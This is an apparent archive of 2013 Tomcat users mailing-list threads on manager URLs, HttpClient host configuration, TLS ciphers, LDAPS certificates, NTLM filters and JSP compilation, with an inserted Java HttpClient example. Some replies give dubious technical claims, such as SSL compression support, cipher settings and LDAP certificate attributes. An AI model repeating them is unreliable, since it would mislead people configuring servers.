2013-10-17 Thread Martin Gainty
<source>
http://localhost:8080/manager/text/reload?path=/examples
</source>

Signal an existing application to shut itself down and reload.  This can
be useful when the web application context IS NOT RELOADABLE
and you have updated classes or property files in the 
<code>/WEB-INF/classes</code>
directory or when you have added or updated jar files in the
<code>/WEB-INF/lib</code> directory.

Context reloadable attribute would need to reflect reloadable=false e.g.

<Context path="/petclinic" reloadable="false">

Good luck,
Martin 

  



 Date: Thu, 17 Oct 2013 18:45:30 +0200
 From: edoa...@aspix.it
 To: users@tomcat.apache.org
 Subject: can't connect to manager application
 
 My Tomcat (7.0.42) is listening on port 7080 and I have this 
 conf/tomcat-users.xml in (production server)
 
 ---
 <tomcat-users>
 <role rolename="manager-script"/>
 <user username="myname" password="pwd"
 roles="manager-script,manager-gui,manager-jmx"/>
 </tomcat-users>
 --
 if I use
 
 curl -u myname:pwd 
 http://localhost:7080/manager/text/reload?path=/myApplication
 
 the response is--
 <h1>404 Not found</h1>
 <p>
 The page you tried to access
 (/manager/text/reload)
 does not exist.
 </p>
 <p>
 The Manager application has been re-structured for Tomcat 7 onwards and some
 of URLs have changed. All URLs used to access the Manager application should
 now start with one of the following options:
 </p>
 <ul>
 <li>/manager/html for the HTML GUI</li>
 <li>/manager/text for the text interface</li>
 <li>/manager/jmxproxy for the JMX proxy</li>
 <li>/manager/status for the status pages</li>
 </ul>
 <p>
 Note that the URL for the text interface has changed from
 &quot;/manager&quot; to
 &quot;/manager/text&quot;.
 </p>
 <p>
 You probably need to adjust the URL you are using to access the Manager
 application. However, there is always a chance you have found a bug in the
 Manager application. If you are sure you have found a bug, and that the bug
 has not already been reported, please report it to the Apache Tomcat team.
 </p>
 -
 on my local machine all goes well (same tomcat version but on port 
 8080), can't figure what is different on production server... where can 
 I take a look?
 
 Some releases ago (tomcat 7.0.x sorry, I can't be more precise) all was 
 well also on production server. Maybe I did something wrong during an 
 update.
 
 thank you
 Edoardo
 
 
  

RE: RSocket Error

2013-09-19 Thread Martin Gainty
MG> 1) the problem calling executeMethod will need to try{..} catch for 
IOException and HttpException
    /**
     * Executes the given {@link HttpMethod HTTP method}.
     *
     * @param method the {@link HttpMethod HTTP method} to execute.
     * @return the method's response code
     *
     * @throws IOException If an I/O (transport) error occurs. Some transport exceptions
     *                     can be recovered from.
     * @throws HttpException  If a protocol exception occurs. Usually protocol exceptions
     *                    cannot be recovered from.
     */
    public int executeMethod(HttpMethod method)
        throws IOException, HttpException  {

        LOG.trace("enter HttpClient.executeMethod(HttpMethod)");
        // execute this method and use its host configuration, if it has one
        return executeMethod(null, method, null);
    }

MG> 2) If you have a reliable HostConfiguration why not use that?
MG>
    /**
     * Executes the given {@link HttpMethod HTTP method} using the given custom
     * {@link HostConfiguration host configuration} with the given custom
     * {@link HttpState HTTP state}.
     *
     * @param hostconfig The {@link HostConfiguration host configuration} to use.
     * If <code>null</code>, the host configuration returned by {@link #getHostConfiguration} will be used.
     * @param method the {@link HttpMethod HTTP method} to execute.
     * @param state the {@link HttpState HTTP state} to use when executing the method.
     * If <code>null</code>, the state returned by {@link #getState} will be used.
     *
     * @return the method's response code
     *
     * @throws IOException If an I/O (transport) error occurs. Some transport exceptions
     *                     can be recovered from.
     * @throws HttpException  If a protocol exception occurs. Usually protocol exceptions
     *                    cannot be recovered from.
     * @since 2.0
     */
    public int executeMethod(HostConfiguration hostconfig,
        final HttpMethod method, final HttpState state)
        throws IOException, HttpException  {

The constructors are weak for HostConfiguration; you will need to build an empty HostConfiguration,
first set the hostname, port and protocol
    setHost(final String host, int port, final Protocol protocol)
then set the ProxyHost and the proxyPort
    setProxy(final String proxyHost, int proxyPort)

http://www.docjar.com/html/api/org/apache/commons/httpclient/HostConfiguration.java.html

finally on multi-homed or clustered configurations set the InetAddress
/**
  449* Set the local address to be used when creating connections.
  450* If this is unset, the default address will be used.
  451* This is useful for specifying the interface to use on 
multi-homed or clustered systems.
  452* 
  453* @param localAddress the local address to use
  454*/
  455   
  456   public synchronized void setLocalAddress(InetAddress localAddress) 
most people use static route to identify a gateway for a particular IP 
configuration 
request the static route from your net-admin
http://www.nongnu.org/quagga/docs/docs-multi/Static-Route-Commands.html

it is also possible on linux to configure specific rules for multi-homed systems
details on which rule to use for multi-homed on linux the command on which ip 
rule you should also be obtained from net-admin  
ip rule 
listhttps://blogs.oracle.com/networking/entry/advance_routing_for_multi_homed

the rule will point you to the IP you should use in InetAddress

Martin 


 From: divya.prak...@mahindracomviva.com
 To: users@tomcat.apache.org
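
The procedure described in the message above (empty HostConfiguration, then setHost, setProxy and setLocalAddress, with executeMethod wrapped in try/catch), as an added example that is not part of the original message or of the HttpClient project. It assumes Commons HttpClient 3.1 with its commons-logging and commons-codec dependencies on the classpath; the class name, the /ping path and the loopback test server are constructed for the illustration.

```java
import com.sun.net.httpserver.HttpServer;
import java.io.IOException;
import java.net.InetAddress;
import java.net.InetSocketAddress;
import org.apache.commons.httpclient.HostConfiguration;
import org.apache.commons.httpclient.HttpClient;
import org.apache.commons.httpclient.HttpException;
import org.apache.commons.httpclient.methods.GetMethod;
import org.apache.commons.httpclient.protocol.Protocol;

public class HostConfigExample {

    /** Builds the configuration in the order the message gives: host, proxy, local address. */
    static HostConfiguration build(String host, int port, String proxyHost, int proxyPort,
                                   InetAddress localAddress) {
        HostConfiguration hc = new HostConfiguration();        // start from an empty configuration
        hc.setHost(host, port, Protocol.getProtocol("http"));  // hostname, port and protocol
        if (proxyHost != null) {
            hc.setProxy(proxyHost, proxyPort);                 // only when a proxy sits in the path
        }
        if (localAddress != null) {
            hc.setLocalAddress(localAddress);                  // source interface on multi-homed hosts
        }
        return hc;
    }

    /** Returns the HTTP status code, or -1 when the request failed. */
    static int fetch(HostConfiguration hc, String path) {
        HttpClient client = new HttpClient();
        GetMethod get = new GetMethod(path);                   // relative path: the host comes from hc
        try {
            return client.executeMethod(hc, get, null);        // null state = the client's default HttpState
        } catch (HttpException e) {
            // Protocol exception: usually not recoverable, so do not retry blindly.
            // HttpException is a subclass of IOException in 3.x, so it must be caught first.
            System.err.println("protocol error: " + e.getMessage());
            return -1;
        } catch (IOException e) {
            // Transport error (refused, reset, timeout): some of these can be retried.
            System.err.println("transport error: " + e.getMessage());
            return -1;
        } finally {
            get.releaseConnection();                           // always hand the connection back
        }
    }

    public static void main(String[] args) throws IOException {
        // Constructed test target: a throwaway HTTP server on loopback, so nothing leaves the host.
        InetAddress loopback = InetAddress.getByName("127.0.0.1");
        HttpServer server = HttpServer.create(new InetSocketAddress(loopback, 0), 0);
        server.createContext("/ping", exchange -> {
            byte[] body = "pong".getBytes("US-ASCII");
            exchange.sendResponseHeaders(200, body.length);
            exchange.getResponseBody().write(body);
            exchange.close();
        });
        server.start();
        try {
            int port = server.getAddress().getPort();
            // No proxy here; the local address pins the outbound socket to the loopback interface.
            HostConfiguration hc = build("127.0.0.1", port, null, 0, loopback);
            System.out.println("GET /ping from " + hc.getLocalAddress() + " -> " + fetch(hc, "/ping"));
        } finally {
            server.stop(0);
        }
    }
}
```

On a multi-homed production host, replace the loopback address with the address the routing rule selects for the target network.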
 

RE: JspTagException- Stream closed

2013-09-05 Thread Martin Gainty
where is the iter attribute declaration for selection HTML tag?

http://www.w3schools.com/tags/tag_select.asp

Martin 




 From: tinu.b...@amd.com
 To: users@tomcat.apache.org
 Subject: RE: JspTagException- Stream closed
 Date: Thu, 5 Sep 2013 04:09:34 +
 
 Here is the body of the method doEndTag(). The exception is thrown for line 
 number 146, which is this.iter = null; of the reset method.
 
 public int doEndTag()
     throws JspException
 {
     if (this.jdField_bodyContent_of_type_JavaxServletJspTagextBodyContent != null)
     {
         try
         {
             this.jdField_bodyContent_of_type_JavaxServletJspTagextBodyContent.writeOut(this.jdField_bodyContent_of_type_JavaxServletJspTagextBodyContent.getEnclosingWriter());
         }
         catch (IOException localIOException)
         {
             this.jdField_pageContext_of_type_JavaxServletJspPageContext.getServletContext().log(Res.getString(4), localIOException);
             throw new JspTagException(localIOException.getMessage());
         }
     }
 
     reset();
 
     return 6;
 }
 
 private void reset()
 {
     this.sDataSource = null;
     this.changeCurrentRow = true;
     this.useRange = false;
     this.ds = null;
     this.rs = null;
     this.iter = null;
 }
 
 
 
 
 -Original Message-
 From: Babu, Tinu [mailto:tinu.b...@amd.com] 
 Sent: Monday, August 26, 2013 2:51 PM
 To: Tomcat Users List
 Subject: RE: JspTagException- Stream closed
 
 
 
 The RowSetIterate tag is declared in the JSP itself. All the JSPs having this 
 RowSetIterate tag are throwing Stream closed exception. 
 
 
 -Original Message-
 From: Christopher Schultz [mailto:ch...@christopherschultz.net]
 Sent: Wednesday, August 21, 2013 9:41 PM
 To: Tomcat Users List
 Subject: Re: JspTagException- Stream closed
 
 
 Tinu,
 
 On 8/20/13 9:59 PM, Babu, Tinu wrote:
  Here is the piece of code which is throwing the error.
  
  <select name="list1" size="15" multiple>
    <jbo:RowsetIterate datasource="userRole">
      <option value="<jbo:ShowValue datasource="userRole" dataitem="RoleName" />">
        <jbo:ShowValue datasource="userRole" dataitem="RoleDesc" />
      </option>
    </jbo:RowsetIterate>
  </select>
  
  <select name="list2" size="15" multiple>
    <jbo:RowsetIterate datasource="roles">
      <option value="<jbo:ShowValue datasource="roles" dataitem="RoleName" />">
        <jbo:ShowValue datasource="roles" dataitem="RoleDesc" />
      </option>
    </jbo:RowsetIterate>
  </select>
  
  Exception is always being thrown from the RowSetIterate Tags in JSPs. 
  This was working properly with Tomcat4 version and when we upgraded 
  our Tomcat to version 6 we started getting this strange exception.
  
  Please share your thoughts.
 
 Where is the row set itself declared? In the JSP? In a servlet somewhere that 
 executes before the JSP?
 
 In general, I wouldn't recommend making any JDBC calls from within a
 JSP: I prefer to take care of all data acquisition in a servlet (or
 similar) before delegating the creation of a response to the view layer. But 
 that's just me.
 
 -chris

RE: How to retrieve OCSP Information at server side(In Servlet) Tomact ver 7.0.40/Centos

2013-09-03 Thread Martin Gainty

  


 Date: Tue, 3 Sep 2013 13:15:47 +0530
 Subject: How to retrieve OCSP Information at server side(In Servlet) Tomact 
 ver 7.0.40/Centos
 From: sushil.pru...@gmail.com
 To: users@tomcat.apache.org
 
 Hi All
 
 I want to retrieve OCSP information at server side in servlet.
 So currently I am using
 X509Certificate certChain[] = (X509Certificate[])
 request.getAttribute("javax.servlet.request.X509Certificate");
MGassuming 'someone' was smart enough to place certificate name into 
javax.servlet.request.X509Certificate a-priori
 
 and also I have configured below value at /conf/server.xml
 truststoreFile="/LocalDev/software/ssl/server/server.ks"
 truststorePass="password"
 and clientAuth="want"
 Even though I am unable to retrieve value, it's giving null.
 
 
 Any idea, is there any extra configuration I need to do at tomcat side?

MGdifference between accessing truststore and accessing keystore
http://stackoverflow.com/questions/318441/truststore-and-keystore-definitions   
  

RE: Unable to start apache tomcat server

2013-08-31 Thread Martin Gainty
In other words ...this was an eclipse plugin misconfiguration?

If so does eclipse have a support site for plugin misconfiguration(s)?

Martin Gainty 

  


 Date: Sun, 1 Sep 2013 00:27:09 +0530
 Subject: Re: Unable to start apache tomcat server
 From: sushil.pru...@gmail.com
 To: users@tomcat.apache.org
 
 Hi Brit/Marc
 
 Thanks for your time. Problem got resolved using below url.
 http://stackoverflow.com/questions/8520267/localhost8080-gives-404-the-requested-resource-is-not-available
 
 
 On Sun, Sep 1, 2013 at 12:08 AM, Burghard W.V. Britzke 
 b...@charmides.in-berlin.de wrote:
 
  pardon! the word resource could be confusing - the better expression is
  web application which is mapped to /
  so the web application which is mapped to / is missing or is not
  configured.
 
  On 31.08.2013 at 20:34, Burghard W.V. Britzke 
  b...@charmides.in-berlin.de wrote:
 
   but this means that tomcat is up and running (like Marc stated before).
  only the resource / is missing. what is the content of your webapps
  directory?
  
   On 31.08.2013 at 20:03, Sushil Prusty sushil.pru...@gmail.com wrote:
  
   Hi
  
   I am very sorry, I am using http://localhost:8080 not https://.
   I am getting below status when I am opening.
   HTTP Status 404 - /
  
   type Status report
  
   message /
  
   description The requested resource is not available.
   Apache Tomcat/7.0.42
  
  
   On Sat, Aug 31, 2013 at 11:27 PM, Caldarale, Charles R 
   chuck.caldar...@unisys.com wrote:
  
   From: Sushil Prusty [mailto:sushil.pru...@gmail.com]
   Subject: Re: Unable to start apache tomcat server
  
   I am using https://localhost:8080.
  
   Use http, not https. If you want to use https, you will need to
  configure
   an additional Connector (usually on port 8443), including
  establishing a
   server certificate.
  
   - Chuck
  
  
  
  
 
 
  

RE: Tomcat 7 / Java 7 with TLS 1.2 algorithms

2013-08-22 Thread Martin Gainty
what's supposed to happen:


The specified cipher in SSLCipherSuite is supposed to be enabled 
when specified within 

SSLCipherSuite=SHA256/384


to allow the Server to arbitrate the ordering of ciphers(instead of the client) 

SSLHonorCipherOrder=true


http://tomcat.apache.org/tomcat-7.0-doc/config/http.html


does this not work for you?


Martin Gainty 

  



From: d...@sosnoski.com
Subject: Tomcat 7 / Java 7 with TLS 1.2 algorithms
To: users@tomcat.apache.org
CC: 
Date: Thu, 22 Aug 2013 04:41:54 -0400

Tomcat 7.0.40 seems to work well with TLS 1.2, forced by using a 
sslEnabledProtocols=TLSv1.2 attribute on the Connector. But I haven't been 
able to make it work with any of the SHA256/384 algorithms - they always show 
up in the Ignoring unsupported cipher suite list. I get the same thing 
happening when I try to use them from client code, so I know it's not a Tomcat 
issue, but I'm hoping someone knows a workaround.
 
Any suggestions?
 
Thanks,
 
  - Dennis
 

 

RE: Tomcat 7 / Java 7 with TLS 1.2 algorithms

2013-08-22 Thread Martin Gainty
point of confusion Eric Rescorla specifically cites SHA384 in his cipher 
examples for TLS 1.2 Update

http://www.ietf.org/rfc/rfc5246.txt
http://www.ietf.org/proceedings/70/slides/tls-0.pdf

Kuat Eshengazin used bltest as a test harness for SHA384
 
bltest -R -m prf_sha384 -k tests/prf_sha384/key0 -t
tests/prf_sha384/seed0 -h -g 148 -x

https://bugzilla.mozilla.org/show_bug.cgi?id=480514
 
Is this incorrect?
Martin 

  


 Date: Thu, 22 Aug 2013 14:53:55 +0100
 Subject: Re: Tomcat 7 / Java 7 with TLS 1.2 algorithms
 From: aterrest...@gmail.com
 To: users@tomcat.apache.org
 
 According to RFC 5246 Appendix C (TLS 1.2), there is no SHA384. See :
 http://www.ietf.org/rfc/rfc5246.txt
 
 The JSSE Reference Guide also doesn't talk about this SHA384 as an
 implementation requirement. See :
 http://docs.oracle.com/javase/7/docs/technotes/guides/security/StandardNames.html#impl
 
 This means you have a problem with SHA256 only. Maybe it's easier to
 test on client-side, with one of the following ciphers (that you find
 on the same Reference Guide ) for example :
 
 TLS_DH_RSA_WITH_AES_256_CBC_SHA256
 TLS_DHE_RSA_WITH_AES_256_CBC_SHA256
 
 Let me know if this works, or I will try to test by myself with my own client.
 
 
 
 2013/8/22 Dennis Sosnoski d...@sosnoski.com:
  I've already done that, though as far as I can see that doesn't affect the
  digest algorithms (only the encryption options).
 
  - Dennis
 
 
  On 08/23/2013 12:24 AM, Aurélien Terrestris wrote:
 
  Hello
 
  I suppose you need to run your JVM with the unrestricted policy files (on
  both client and server sides). You have to download them from Oracle
  website for your java version, and replace the old.
 
  These files are :
  local_policy.jar
  US_export_policy.jar
 
  Regards
 
  2013/8/22 d...@sosnoski.com:
 
  Tomcat 7.0.40 seems to work well with TLS 1.2, forced by using a
  sslEnabledProtocols=TLSv1.2 attribute on the Connector. But I haven't
  been able to make it work with any of the SHA256/384 algorithms - they
  always show up in the Ignoring unsupported cipher suite list. I get the
  same thing happening when I try to use them from client code, so I know 
  it's
  not a Tomcat issue, but I'm hoping someone knows a workaround.
 
  Any suggestions?
 
  Thanks,
 
  - Dennis
 
 
 
 
  

RE: Tomcat config question: 'compression' versus 'SSLDisableCompression'

2013-08-08 Thread Martin Gainty
as earlier mentioned 
 
chrome is the only browser that supports compression on SSL streams

Martin 


 
 Date: Thu, 8 Aug 2013 17:47:36 -0400
 Subject: Re: Tomcat config question: 'compression' versus 
 'SSLDisableCompression'
 From: dlan...@gmail.com
 To: users@tomcat.apache.org
 
 On Thu, Aug 8, 2013 at 5:19 PM, Christopher Schultz 
 ch...@christopherschultz.net wrote:
 
 
  ... and the SSLDisableCompression setting (when set to false) is
  intended to mitigate the CRIME attack against SSL/TLS compression.
  Feel free to read online all about the CRIME attack.
 
 
 That was what I was hoping it did when I asked the original question :)
 
 
  I haven't really done any analysis of SSL compression (that is,
  compression as implemented by the TLS/SSL layer) alone versus
  compression-less-SSL + gzip, but I suspect that any combination of
  compression and encryption can lead to CRIME-like attacks ...
 
 
 That seems to be true since there is now the BREACH attack:
 
 http://arstechnica.com/security/2013/08/gone-in-30-seconds-new-attack-plucks-secrets-from-https-protected-pages/
 
 which (I think) is compression-less-SSL + gzip.
  

RE: LDAP/Realm with TLS in Tomcat 6/7?

2013-08-06 Thread Martin Gainty
you will need to supply any security credentials to that  layer and inform the 
connector you are using protocol=TLS 
and match each attribute to attribute from the supplied key package (.pfx/.p7b)
 
http://tomcat.apache.org/tomcat-4.1-doc/ssl-howto.html
 
HTH,
Martin 

 
 Date: Tue, 6 Aug 2013 13:36:41 +0200
 From: ognjen.d.blagoje...@gmail.com
 To: users@tomcat.apache.org
 Subject: Re: LDAP/Realm with TLS in Tomcat 6/7?
 
 Jens,
 
 On 6.8.2013 12:44, Jens Neu wrote:
  is there a lib/method/whatever to achieve Realm Auth in Tomcat  5.x where
  username/password are protected by TLS?
 
 I never tried it myself, but you might find these links useful:
 
https://wiki.apache.org/tomcat/JNDI_startTLs_HowTo
https://issues.apache.org/bugzilla/show_bug.cgi?id=49785
https://www.mail-archive.com/users@tomcat.apache.org/msg80660.html
 
 
  org.apache.catalina.realm.JNDIRealm works with Tomcat 5, but not in 6 :-(
 
 JNDIRealm should work just fine in any supported Tomcat version. If you 
 have any problems with it, please report it here.
 
 BTW, if you are already upgrading, you may consider to upgrade directly 
 to latest Tomcat 7, to save yourself from doing two upgrades.
 
 -Ognjen
 
 
  

RE: /META-INF/context.xml seemingly ignored

2013-08-04 Thread Martin Gainty
Nicholas possibly CATALINA_BASE environment variable is missing? 
http://blog.andrewbeacock.com/2007/08/getting-tomcat-contexts-to-work-in.html

gotta love those brit techs!
Martin 

 
 Subject: Re: /META-INF/context.xml seemingly ignored
 From: nicho...@nicholaswilliams.net
 Date: Sun, 4 Aug 2013 14:47:49 -0500
 To: users@tomcat.apache.org
 
 
 On Aug 4, 2013, at 11:16 AM, Konstantin Kolinko wrote:
 
  2013/8/4 Mark Thomas ma...@apache.org:
  On 04/08/2013 02:27, Nick Williams wrote:
  
  
  Yes. There's a TOMCAT_HOME/work/Catalina/localhost/support directory, but 
  TOMCAT_HOME/conf/Catalina is empty.
  
  There should be conf/Catalina/localhost directory that is empty. (The
  Catalina directory is not empty).
 
 Yes, my bad. conf/Catalina/localhost exists but is empty.
 
  
  
  As expected for Tomcat 8. copyXML is false by default.
  
  (Yes the default has changed again.)
  
  Huh? The copyXML is false by default in Tomcat 7 as well. I do not see
  any change here.
  
  It might be good time to start migration guide page for Tomcat 8.
 
 Agreed.
 
 So, looking at this further, this might be an IntelliJ IDEA bug. I'm 
 deploying the application using the Tomcat support in IDEA. IDEA creates a 
 directory 
 C:\Users\Nicholas\.IntelliJIdea12\system\tomcat\Unnamed_Customer-Support-v15\conf\Catalina\localhost
  and that directory contains support.xml with my context.xml contents. I'm 
 betting it's not hooking that up properly. I'll research that route instead.
 
 Sorry if I've wasted anyone's time looking into this.
 
 Nick
 
  

RE: Cert

2013-08-02 Thread Martin Gainty
Daniel
 
...he hasn't imported his DER typed certificate into the LDAP Server yet..

Martin 

 
 Subject: Re: Cert
 From: dmik...@gopivotal.com
 Date: Fri, 2 Aug 2013 08:58:12 -0400
 To: users@tomcat.apache.org
 
 On Aug 2, 2013, at 7:33 AM, Kyle Shattuck ky...@montcalm.edu wrote:
 
  Hello,
  I am using Tomcat 7 on a windows server 2012 build for this: 
  https://wiki.jasig.org/display/CASUM/Best+Practice+-+Setting+Up+CAS+Locally+using+the+Maven2+WAR+Overlay+Method
  
  I don't think SSL is not working correctly because every time I try to 
  authenticate over LDAPS it does not work.
 
 What part of this doesn't work?  Connecting via SSL or authentication via 
 LDAP?  They are two different things.
 
 Can you connect to your server via HTTPS and access a static resource like an 
 HTML page or image file?  If not, what happens when you try to connect?
 
  
  I created a .csr and a .jks using the java keytool. I got a cert using my 
  .csr file from digicert by downloading it to a .p7b file. I imported the 
  .p7b file to my %jave_home%\bin\mykeystore.jks. I then download from 
  digicert the same cert but in a .pem file and imported the file to my 
  %jave_home5\jre\lib\security\cacerts.
  
  Did I miss something here, do you need any other info?
 
  - What is the specific version of Tomcat that you are using?
  - Do you see any errors in the log?
  - Include your server.xml, minus comments and minus any sensitive info like 
 passwords
 
 Dan
 
  
  Thank you,
  Kyle
  
 
 
 
  

RE: Cert

2013-08-02 Thread Martin Gainty
Kyle
 
the ldap server requires the LDAP Attributes contained within the p7b

dn: cn=username,o=organization,c=country
objectclass:inetorgperson
objectclass:organizationalPerson
cn: username
sn: surname

your LDAP admin has 2 options:

1)enter each one manually from the attributes enumerated from the cert 
2) import your DER formatted certificate into LDAP (and let the import utility 
auto-populate the LDAP attributes) for example
2a)Cisco LDAP Server
http://www.cisco.com/en/US/docs/switches/datacenter/sw/6_x/nx-os/security/configuration/guide/b_Cisco_Nexus_7000_NX-OS_Security_Configuration_Guide__Release_6.x_chapter_0111.html
2b)IBM LDAP Server
http://pic.dhe.ibm.com/infocenter/tivihelp/v2r1/index.jsp?topic=%2Fcom.ibm.itamfbi.doc_5.1%2FADM51mst160.htm

it looks like we will need to engage the LDAP admin to take this any 
further..can you cc him?

Martin 

 
From: ky...@montcalm.edu
To: users@tomcat.apache.org
Subject: RE: Cert
Date: Fri, 2 Aug 2013 13:23:12 +

My Server (CAS) is using SSL and the LDAP (DC) server uses SSL. So when I try to 
authenticate through my CAS server to DC over LDAPS it does not work. When I 
look at the logs of the Applications and Services Logs --Directory Service 
it says--
InformationActiveDirectory_DomainService1535LDAP Interface:
Internal event: The LDAP server returned an error. 
 
Additional Data 
Error value:
0003: LdapErr: DSID-0C060463, comment: Error decrypting ldap message, data 
0, v1db1
 
Tomcat version:apache-tomcat-7.0.42
 
-Original Message-
From: Daniel Mikusa [mailto:dmik...@gopivotal.com] 
Sent: Friday, August 02, 2013 8:59 AM
To: Tomcat Users List
Subject: Re: Cert
 
On Aug 2, 2013, at 7:33 AM, Kyle Shattuck ky...@montcalm.edu wrote:
 
 Hello,
 I am using Tomcat 7 on a windows server 2012 build for this: 
 https://wiki.jasig.org/display/CASUM/Best+Practice+-+Setting+Up+CAS+Locally+using+the+Maven2+WAR+Overlay+Method
 
 I don't think SSL is not working correctly because every time I try to 
 authenticate over LDAPS it does not work.
 
What part of this doesn't work?  Connecting via SSL or authentication via LDAP? 
 They are two different things.
 
Can you connect to your server via HTTPS and access a static resource like an 
HTML page or image file?  If not, what happens when you try to connect?
 
 
 I created a .csr and a .jks using the java keytool. I got a cert using my 
 .csr file from digicert by downloading it to a .p7b file. I imported the .p7b 
 file to my %jave_home%\bin\mykeystore.jks. I then download from digicert the 
 same cert but in a .pem file and imported the file to my 
 %jave_home5\jre\lib\security\cacerts.
 
 Did I miss something here, do you need any other info?
 
 - What is the specific version of Tomcat that you are using?
 - Do you see any errors in the log?
 - Include your server.xml, minus comments and minus any sensitive info like 
passwords
 
Dan
 
 
 Thank you,
 Kyle
 
 
 
  

RE: java.net.UnknownHostException: Failed to negotiate with a suitable domain controller for xxx

2013-08-01 Thread Martin Gainty
nslookup DomainName

if you still call no joy there is nothing we can do (without contacting your 
Domain Admin and asking if DomainName is live)

Martin 

 
 From: seema...@hotmail.com
 To: users@tomcat.apache.org
 Subject: RE: java.net.UnknownHostException: Failed to negotiate with a 
 suitable domain controller for xxx
 Date: Thu, 1 Aug 2013 12:02:34 +0100
 
 
 
  Date: Thu, 1 Aug 2013 12:06:39 +0200
  From: a...@ice-sa.com
  To: users@tomcat.apache.org
  Subject: Re: java.net.UnknownHostException: Failed to negotiate with a 
  suitable domain controller for xxx
  
  Seema Patel wrote:
   Hi,

   I am not sure if this is the right List to post this on, please advise if 
   it isn't and let me know where is best to post.

   I am getting the following error on one of our applications running on 
   our intranet:

   2013-07-31 17:15:11,180 [http-xxx.xxx.x.xxx-xx-x] ERROR org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/forms].[action] - Servlet.service() for servlet action threw exception
   java.net.UnknownHostException: Failed to negotiate with a suitable domain controller for xxx.LOCAL
   at jcifs.smb.SmbSession.getChallengeForDomain(SmbSession.java:187)
   at jcifs.http.NtlmHttpFilter.negotiate(NtlmHttpFilter.java:150)
   at jcifs.http.NtlmHttpFilter.doFilter(NtlmHttpFilter.java:114)
   at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215)
   at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188)
   at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213)
   at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:172)
   at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:465)
   at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127)
   at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117)
   at org.apache.catalina.authenticator.SingleSignOn.invoke(SingleSignOn.java:393)
   at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108)
   at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:174)
   at org.apache.coyote.http11.Http11AprProcessor.process(Http11AprProcessor.java:837)
   at org.apache.coyote.http11.Http11AprProtocol$Http11ConnectionHandler.process(Http11AprProtocol.java:640)
   at org.apache.tomcat.util.net.AprEndpoint$Worker.run(AprEndpoint.java:1287)
   at java.lang.Thread.run(Unknown Source)

  
  I believe that you should read this page carefully, in particular the blue 
  text at the 
  beginning : http://jcifs.samba.org/src/docs/ntlmhttpauth.html
  
  Can you have a look at the WEB-INF/web.xml file *of your application*, and 
  check if there 
  is a servlet filter configured there, which matches the name above ?
  
  If so, make a backup copy of that web.xml file, and then edit it to remove 
  that filter 
  from it, and try again.
  I am not quite sure, but it looks possible to me that you have a duplicate 
  authentication 
  mechanism in use : one at the container (Tomcat) level, and one at the 
  application level.
  And the one used at the application level is obsolete, unsupported, 
  unmaintained etc..
  
 
 I have found out that JCIFS is no longer supported, but it will take a lot of 
 time, development and resources to update it to the recommended Jespa.  In my 
 web.xml file I have the following:
 
 <filter>
 <filter-name>NtlmHttpFilter</filter-name>
 <filter-class>jcifs.http.NtlmHttpFilter</filter-class>

 <!--
 always needed for preauthentication / SMB signatures
 -->
 <init-param>
 <param-name>jcifs.smb.client.domain</param-name>
 <param-value>xxx</param-value>
 </init-param>
 <!-- SMB message signing 

RE: SSL and 408 error code (incomplete request)

2013-07-31 Thread Martin Gainty
what happens if you increase the connectionTimeout (on your ssl connector) to a 
longer interval  e.g.?
 
$CATALINA_HOME/conf/server.xml  
 
  <Connector port="8443" protocol="HTTP/1.1" SSLEnabled="true"
             connectionTimeout="3"



Martin 
 
 Date: Wed, 31 Jul 2013 14:32:39 -0700
 From: solmy...@yahoo.com
 Subject: SSL and 408 error code (incomplete request)
 To: users@tomcat.apache.org
 
 Hi,
 
 
 Has anyone happened to stumble onto this issue, please:
 Our Ajax works perfectly as long as it's non-secure.
 However, when switching to SSL we sometimes see 408 errors (incomplete 
 request). This only happens on ajax, and inconsistently (similar requests 
 might succeed on one moment, but fail on the other).
 
 Please note:
 1. Our client is Chrome browser, using JQuery for ajax
 2. Server is Tomcat 7
 3. Network is fast and stable, and the ajax requests are small
 4. Problem occurs for both our connectors: APR and Http (both with SSL 
 enabled) 
 5. Our x509 certificate is valid (otherwise it would have failed on *all* 
 ajax ssl requests, not to mention the non-ajax ssl)
 
 Thanks :)
 
 
  

RE: OSGi in Tomcat

2013-07-24 Thread Martin Gainty
asking your release manager to build an OSGI artifact with eclipse may be a bit 
of a stretch if this is a live production-ready system then you will most 
likely be building at command-line with either ant or maven

the trickiest part is interfacing to BND start and BND stop which can be 
accomplished with Activator sample code seen here
http://wso2.com/library/tutorials/develop-osgi-bundles-using-maven-bundle-plugin
 
let's pick this thread on us...@maven.apache.org

Martin 

 
 Date: Wed, 24 Jul 2013 13:30:01 +0300
 Subject: Re: OSGi in Tomcat
 From: miles...@gmail.com
 To: users@tomcat.apache.org
 
 2013/7/23 Leonardo Torres wrote:
 
  Thanks for reply.
 
  Just one more question, If I want to use tomcat inside of OSGi environment,
  how can I do that ?
 
 
 Check Gemini Web documentation:
 
 http://www.eclipse.org/gemini/web/documentation/
 http://wiki.eclipse.org/Gemini/Web
 
 Regards
 Violeta
  

RE: OT: How to use JSP outside of tomcat

2013-07-24 Thread Martin Gainty
 
Documentation hasn't caught up with functionality so it's catch as catch can but 
this should get you to what you need

pom.xml
 
<project>
  <modelVersion>4.0.0</modelVersion>
  <groupId>fu</groupId>
  <artifactId>bar</artifactId>
  <build>
    <plugins>
      <plugin>
        <groupId>org.codehaus.mojo.jspc</groupId>
        <artifactId>jspc-maven-plugin</artifactId>
        <configuration>
          <includeInProject>false</includeInProject>
          <sources>
            <directory>${basedir}/myapp/src/main/webapp/</directory>
            <includes>
              <include>**/*.jsp</include>
            </includes>
          </sources>
          <source>1.6</source>
          <target>1.6</target>
        </configuration>
        <executions>
          <execution>
            <goals>
              <goal>compile</goal>
            </goals>
          </execution>
        </executions>
      </plugin>
    </plugins>
  </build>
  ...
</project>
 
mvn -e -X compile

http://mojo.codehaus.org/jspc/jspc-compilers/jspc-compiler-tomcat6/index.html
http://mojo.codehaus.org/jspc/jspc-maven-plugin/usage.html

